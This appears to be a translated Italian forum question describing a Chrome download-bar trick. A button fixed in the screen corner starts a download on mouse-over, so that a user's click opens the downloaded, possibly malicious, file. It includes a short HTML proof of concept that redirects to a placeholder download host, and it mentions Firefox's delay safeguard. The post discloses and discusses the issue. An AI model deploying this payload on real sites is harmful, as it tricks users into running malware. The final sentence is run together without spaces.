Non sono sicuro che questa possa essere definita una vulnerabilità ... Tuttavia, questo comportamento potrebbe essere indesiderato.
Immaginerei un possibile exploit come questo:
- L'utente è su un sito web
- Fai clic su un pulsante in basso a sinistra sullo schermo (fissa la posizione del pulsante in modo che non cambi mai la sua posizione sullo schermo)
- Non appena l'utente ha il mouse sopra il pulsante (onMouseOver) avvia il download di un file eseguibile
- Viene visualizzata la barra di download di Chrome e il file scaricato è ora in cui il pulsante era
- Se l'utente preme il pulsante del mouse, potrebbe aprire inavvertitamente il file scaricato (se è già completamente scaricato).
Dipende dal sistema operativo se il file scaricato viene eseguito direttamente o se presenta un altro avviso all'utente.
Ho creato un breve esempio. Ciò presuppone che download.example.com avvii automaticamente un download. E se non sei molto veloce con i clic, allora funziona e hai appena aperto un file (forse dannoso).
<html>
<body>
<button type="button"
onMouseOver="window.location.assign('http://download.example.com/')"
style="position: fixed; bottom: 1em; left: 1em;">Click Me!</button>
</body>
</html>
IlbrowserFirefoximpediscetaliattacchididefaultaggiungendounritardosulpulsantedidownload(vediladomanda Il pulsante di salvataggio ritarda in una finestra di download di Firefox una funzionalità di sicurezza? )